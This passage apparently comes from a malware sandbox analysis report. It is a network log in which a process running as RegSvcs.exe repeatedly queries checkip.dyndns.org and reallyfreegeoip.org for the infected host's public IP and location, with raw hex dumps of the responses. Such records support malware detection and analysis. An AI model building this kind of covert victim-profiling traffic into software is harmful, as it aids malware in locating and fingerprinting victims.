User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:18.808058977 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:18 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: dc10311159c2670452ed8fcc0097bd66
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49748 | 158.101.44.242 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:19.433346033 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:20.000343084 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:19 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cd59ad404384ee4fe9dc1086b09a369f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49752 | 158.101.44.242 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:20.614590883 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:21.237056017 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:21 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 994e4386612eab1ac2fb840b392f087d
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49755 | 158.101.44.242 | 80 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:26.332545042 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:26.912889957 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:26 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ea5706e62470106aa7f41da2747ca749
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:44:26.916616917 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:44:27.292238951 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7ae46441aeb8aaa84bde11dd3a7980f1
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:44:28.038208008 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:44:28.192877054 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b1a3e7fad1e5e5b0b6c56a7024b763c3
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49758 | 158.101.44.242 | 80 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:28.812019110 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:44:29.374680996 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:29 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ee67bbf8cbb37d9ba41df32e8d6b387f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49760 | 158.101.44.242 | 80 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:29.977925062 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:44:30.545660019 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:30 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4403563652166d7cac26f799a00a1693
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49762 | 158.101.44.242 | 80 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:31.193432093 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:44:31.771938086 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ef9db2137cbfd62cbc8d7274f2cda811
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49764 | 158.101.44.242 | 80 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:32.508610010 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:33.083934069 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:33 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cdf4af8b880144e6c864bdbad4b282b0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49766 | 158.101.44.242 | 80 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:33.704691887 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:34.296876907 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8c236a87bab09da06e8e32cdf4f9d1b0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49768 | 158.101.44.242 | 80 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:34.939143896 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:35.528271914 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:35 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 87244418649ce1db501173995465e265
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49770 | 158.101.44.242 | 80 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:36.152740955 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:36.770400047 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:36 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9730c03ac67da6984342fae21352b9a9
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 104.21.16.1 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:12 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 22:44:12 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:12 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1863841
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6WpFb53XWljWqmrZJIcVzfRk63h3R%2F4Oe81GZnU6R8LkNvEgocUNSRbQnN3E7ZGvHwp0Oao%2BrbSfphU64Huw6MLj2QBM7HKfi25Ho941AyvuZXOxZGtaMhxvKu%2FcHv9FQ4GPQv6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900030b9d8c01899-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1603&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1685912&cwnd=153&unsent_bytes=0&cid=2596f5d03d42cd26&ts=198&x=0"
2025-01-10 22:44:12 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 104.21.16.1 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:13 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 22:44:13 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:13 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1863842
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jcwfFbfiOcBDcIM84olnST3J%2F7f8LsIzl7rNpVd65HCoK6%2FX4ClH8zpM4FJuq3cFfwaGxcynDf4fPeXH7MmPCKz7JlUD2FP%2FOgxgyrli78k0Abj39prCSl8DzCMHm3RXDbO5k6EK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900030becd6c41ba-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1648&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1763285&cwnd=192&unsent_bytes=0&cid=32647e85ec4a1550&ts=168&x=0"
2025-01-10 22:44:13 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 104.21.16.1 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:14 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 22:44:14 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:14 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1863843
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6em4ZGCcB6fgenm7GXm8rS4m3RH7KMvJ33ZJF2PjmbwYBnLi1uVCS%2FHWbtt8Y40otPsANjD1Y%2BpLQTnMgaavTXKP%2FlUFlmD7YaWWVKVvhiA88Rsrie7R7YevWs2CZQAP2KSv%2F%2BjM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900030c67efc0fa8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1473&rtt_var=579&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1846932&cwnd=252&unsent_bytes=0&cid=3e9c05bc3540c596&ts=139&x=0"
2025-01-10 22:44:14 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49737 | 104.21.16.1 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:15 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 22:44:15 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:15 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1863844
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kUrhI93NHAadMYbm3QiVfswL21Ra5EHk9UKPgm9IqXeczOpMx%2Bxhx%2Bmvt80nYg1RybP9fn7SVshhd6tLoPzaE%2FKswpnrboIAY6gVIA0SmC9FnL1Yj%2BGlxGlydcTohV7TDf2UlIlP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900030ce2db77293-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=2042&rtt_var=785&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1429970&cwnd=158&unsent_bytes=0&cid=53b2f92b4c35cb41&ts=163&x=0"
2025-01-10 22:44:15 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 104.21.16.1 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
